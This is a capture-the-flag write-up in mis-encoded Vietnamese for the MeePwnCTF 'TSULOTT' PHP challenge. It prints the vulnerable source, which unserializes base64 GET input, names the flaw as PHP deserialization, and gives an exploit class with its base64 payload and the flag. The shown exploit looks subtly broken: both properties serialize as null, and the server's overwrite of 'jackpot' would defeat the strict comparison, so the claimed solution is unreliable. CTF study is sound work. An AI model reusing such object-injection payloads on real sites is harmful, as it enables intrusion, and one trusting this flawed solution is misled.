πTSULOTT
Easy

Overview
VΓ o ΔαΊ§u chΓΊng ta sαΊ½ cΓ³ hai trΖ°α»ng inpit nhαΊp vΓ o, nhαΊp code cα»§a bαΊ‘n Δα» nhαΊn win jackpot vΓ nhαΊp 6 sα» Δα» lαΊ₯y code.
α» ΔΓ’y chΓΊng ta sαΊ½ nhαΊp ΔαΊ‘i gΓ¬ ΔΓ³ nhΖ°ng chΓΊng ta sαΊ½ nhαΊp α» take code trΖ°α»c rα»i lαΊ₯y mα»t chuα»i base64 mΓ trang ΔΖ°a ra rα»i nΓ³ sαΊ½ trαΊ£ vα» kαΊΏt quαΊ£ nhΖ° hΓ¬nh α» dΖ°α»i.

Analys
Sau mα»t lΓΊc thΓ¬ chΓΊng ta xem source code hiα»n tαΊ‘i cΓ³ gΓ¬ ctrl+U

α» ΔΓ’y cΓ³ gợi Γ½ cho chΓΊng ta lΓ GET/?is_debug=1
sau khi nhαΊp vΓ o chΓΊng ta sαΊ½ cΓ³ source code cα»§a bΓ i nhΖ° sau:

<body>
<style>
input[type=text] {
width: 40%;
padding: 12px 20px;
margin: 8px 0;
box-sizing: border-box;
border: 2px solid red;
background-color: #ebfff8;
border-radius: 4px;
}
button[type=submit] {
width: 10%;
background-color: #F94848;
color: white;
padding: 14px 20px;
margin: 8px 0;
border: none;
border-radius: 4px;
cursor: pointer;
}
button[type=submit]:hover {
background-color: #45a049;
}
body {
background-image: url("money.jpg");
}
</style>
<?php
class Object
{
var $jackpot;
var $enter;
}
?>
<?php
include('secret.php');
if(isset($_GET['input']))
{
$obj = unserialize(base64_decode($_GET['input']));
if($obj)
{
$obj->jackpot = rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99);
if($obj->enter === $obj->jackpot)
{
echo "<center><strong><font color='white'>CONGRATULATION! You Won JACKPOT PriZe !!! </font></strong></center>". "<br><center><strong><font color='white' size='20'>".$obj->jackpot."</font></strong></center>";
echo "<br><center><strong><font color='green' size='25'>".$flag."</font></strong></center><br>";
echo "<center><img src='http://www.relatably.com/m/img/cross-memes/5378589.jpg' /></center>";
}
else
{
echo "<br><br><center><strong><font color='white'>Wrong! True Six Numbers Are: </font></strong></center>". "<br><center><strong><font color='white' size='25'>".$obj->jackpot."</font></strong></center><br>";
}
}
else
{
echo "<center><strong><font color='white'>- Something wrong, do not hack us please! -</font></strong></center>";
}
}
else
{
echo "";
}
?>
<center>
<br><h2><font color='yellow' size=8>-- TSU</font><font color='red' size=8>LOTT --</font></h2>
<p><p><font color='white'>Input your code to win jackpot!</font><p>
<form>
<input type="text" name="input" /><p><p>
<button type="submit" name="btn-submit" value="go">send</button>
</form>
</center>
<?php
if (isset($_GET['gen_code']) && !empty($_GET['gen_code']))
{
$temp = new Object;
$temp->enter=$_GET['gen_code'];
$code=base64_encode(serialize($temp));
echo '<center><font color=\'white\'>Here is your code, please use it to Lott: <strong>'.$code.'</strong></font></center>';
}
?>
<center>
<font color='white'>-----------------------------------------------------------------------------------------------------------------------------</font>
<h3><font color='white'>Take code</font></h3><p>
<p><font color='white'>Pick your six numbers (Ex: 15 02 94 11 88 76)</font><p>
<form>
<input type="text" name="gen_code" maxlength="17" /><p><p>
<button type="submit" name="btn-submit" value="go">send</button>
</form>
</center>
<!-- debug: GET is_debug=1 -->
<?php
if(isset($_GET['is_debug']) && $_GET['is_debug']==='1')
{
show_source(__FILE__);
}
?>
</body>
ChΓΊng ta sαΊ½ chΓΊ Γ½ tα»i hai ΔoαΊ‘n code PHP nhΖ° sau:
<?php
class Object
{
var $jackpot;
var $enter;
}
?>
<?php
include('secret.php');
if(isset($_GET['input']))
{
$obj = unserialize(base64_decode($_GET['input']));
if($obj)
{
$obj->jackpot = rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99);
if($obj->enter === $obj->jackpot)
{
echo "<center><strong><font color='white'>CONGRATULATION! You Won JACKPOT PriZe !!! </font></strong></center>". "<br><center><strong><font color='white' size='20'>".$obj->jackpot."</font></strong></center>";
echo "<br><center><strong><font color='green' size='25'>".$flag."</font></strong></center><br>";
echo "<center><img src='http://www.relatably.com/m/img/cross-memes/5378589.jpg' /></center>";
}
else
{
echo "<br><br><center><strong><font color='white'>Wrong! True Six Numbers Are: </font></strong></center>". "<br><center><strong><font color='white' size='25'>".$obj->jackpot."</font></strong></center><br>";
}
}
else
{
echo "<center><strong><font color='white'>- Something wrong, do not hack us please! -</font></strong></center>";
}
}
else
{
echo "";
}
?>
α» dΖ°α»i cΓ³ thΓͺm ΔoαΊ‘n code serialize nα»i dung code chΓΊng ta nhαΊp α» dΖ°α»i.
TΓ³m lαΊ‘i khi nΓ y chΓΊng ta nhαΊn ra ΔΓ’y lΓ PHP Deserialization
khi ΔΓ³ chΓΊng ta cΓ³ thα» control cαΊ£ class Object trΓͺn bαΊ±ng cΓ‘ch ghi ΔΓ¨ nΓ³ Δα» hai thuα»c tΓch jackpot vΓ enter bαΊ±ng nhau.
Exploit
Γ tΖ°α»ng bΓ’y giα» chΓΊng ta sαΊ½ xΓ’y dα»±ng lαΊ‘i class Object giα»ng nhΖ° trΓͺn vΓ khα»i tαΊ‘o hΓ m __constructor
cho hai thuα»c tΓnh bαΊ±ng nhau.
<?php
class Exploit
{
var $jackpot;
var $enter;
public function __construct()
{
$this->jackpot=$this->enter;
}
}
$code = new Exploit();
echo base64_encode(serialize($code));
//Tzo3OiJFeHBsb2l0IjoyOntzOjc6ImphY2twb3QiO047czo1OiJlbnRlciI7Tjt9

Flag: MeePwnCTF{__OMG!!!__Y0u_Are_Milli0naire_N0ww!!___}
Last updated